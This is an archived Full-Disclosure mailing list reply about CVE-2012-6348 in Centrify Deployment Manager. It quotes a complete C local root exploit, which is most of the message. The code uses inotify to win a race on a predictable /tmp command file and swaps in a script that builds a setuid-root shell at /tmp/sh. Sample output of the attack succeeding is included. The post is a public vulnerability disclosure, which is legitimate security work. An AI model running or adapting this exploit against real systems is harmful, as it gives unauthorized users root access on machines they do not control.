[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root
- To: noloader@xxxxxxxxx
- Subject: Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Tue, 18 Dec 2012 20:56:37 +0000 (GMT)
<html><body><div>These guys were really cool about it, probably one of the best
vendor responses I've gotten. I am seeing if<br>I can go to the next
iteration of training. =-> <br></div><div><br>On Dec 18, 2012, at
12:51 PM, Jeffrey Walton <noloader@xxxxxxxxx>
wrote:<br><br><div><blockquote type="cite"><div class="msg-quote"><div
class="_stretch">I've got a feeling you will not be sent to anymore vendor
classes :)<br> <br> On Tue, Dec 18, 2012 at 3:49 PM, Larry W. Cashdollar <<a
href="mailto:larry0@xxxxxx"
data-mce-href="mailto:larry0@xxxxxx">larry0@xxxxxx</a>> wrote:<br> >
/*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,<br>
> Centrify released a fix very quickly - nice vendor response.<br> ><br>
> <a href="http://vapid.dhs.org/exploits/centrify_local_r00t.c"
data-mce-href="http://vapid.dhs.org/exploits/centrify_local_r00t.c">http://vapid.dhs.org/exploits/centrify_local_r00t.c</a><br>
><br> > CVE-2012-6348 12/17/2012<br> > <a
href="http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html"
data-mce-href="http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html">http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html</a><br>
> Greetings vladz, Thanks for the inotify & syscall technique.<br>
><br> > This exploit based on <a
href="http://vladz.devzero.fr/010_bzexe-vuln.php"
data-mce-href="http://vladz.devzero.fr/010_bzexe-vuln.php">http://vladz.devzero.fr/010_bzexe-vuln.php</a><br>
><br> > Run the exploit and wait for administrator to analyse or
deploysoftware<br> > to the system.<br> ><br> >
larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0<br> > [*] Launching
attack against "centrify.cmd.0"<br> > [+] Creating evil script
(/tmp/evil)<br> > [+] Creating target file (/bin/touch
/tmp/centrify.cmd.0)<br> > [+] Initialize inotify<br> > [+] Waiting for
root to launch "centrify.cmd.0"<br> > [+] Opening root shell (/tmp/sh)<br>
> #<br> ><br> > Larry W. Cashdollar<br> > @_larry0<br> > */<br>
><br> ><br> > #include <stdlib.h><br> > #include
<stdio.h><br> > #include <unistd.h><br> > #include
<sys/stat.h><br> > #include <sys/types.h><br> > #include
<string.h><br> > #include <sys/inotify.h><br> > #include
<fcntl.h><br> > #include <sys/syscall.h><br> ><br> >
/*Create a small c program to pop us a root shell*/<br> > int
create_nasty_shell(char *file) {<br> > char *s = "#!/bin/bash\n"<br> >
"echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"<br> > "cc
/tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"<br> > "chmod 4755
/tmp/sh;\n";<br> ><br> > int fd = open(file, O_CREAT|O_RDWR,
S_IRWXU|S_IRWXG|S_IRWXO);<br> > write(fd, s, strlen(s));<br> >
close(fd);<br> ><br> > return 0;<br> > }<br> ><br> ><br> >
int main(int argc, char **argv) {<br> > int fd, wd;<br> > char buf[1],
*targetpath, *cmd,<br> > *evilsh = "/tmp/evil", *trash = "/tmp/trash";<br>
><br> > if (argc < 2) {<br> > printf("Usage: %s <target file>
\n", argv[0]);<br> > return 1;<br> > }<br> ><br> > printf("[*]
Launching attack against \"%s\"\n", argv[1]);<br> ><br> > printf("[+]
Creating evil script (/tmp/evil)\n");<br> > create_nasty_shell(evilsh);<br>
><br> > targetpath = malloc(sizeof(argv[1]) + 6);<br> > cmd =
malloc(sizeof(char) * 32);<br> > sprintf(targetpath, "/tmp/%s",
argv[1]);<br> > sprintf(cmd,"/bin/touch %s",targetpath);<br> >
printf("[+] Creating target file (%s)\n",cmd);<br> > system(cmd);<br>
><br> > printf("[+] Initialize inotify\n");<br> > fd =
inotify_init();<br> > wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);<br>
><br> > printf("[+] Waiting for root to change perms on \"%s\"\n",
argv[1]);<br> > syscall(SYS_read, fd, buf, 1);<br> > syscall(SYS_rename,
targetpath, trash);<br> > syscall(SYS_rename, evilsh, targetpath);<br>
><br> > inotify_rm_watch(fd, wd);<br> ><br> > printf("[+] Opening
root shell (/tmp/sh)\n");<br> > sleep(2);<br> > system("rm -fr
/tmp/trash;/tmp/sh || echo \"[-] Failed.\"");<br> ><br> > return 0;<br>
> }<br></div></div></blockquote></div></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/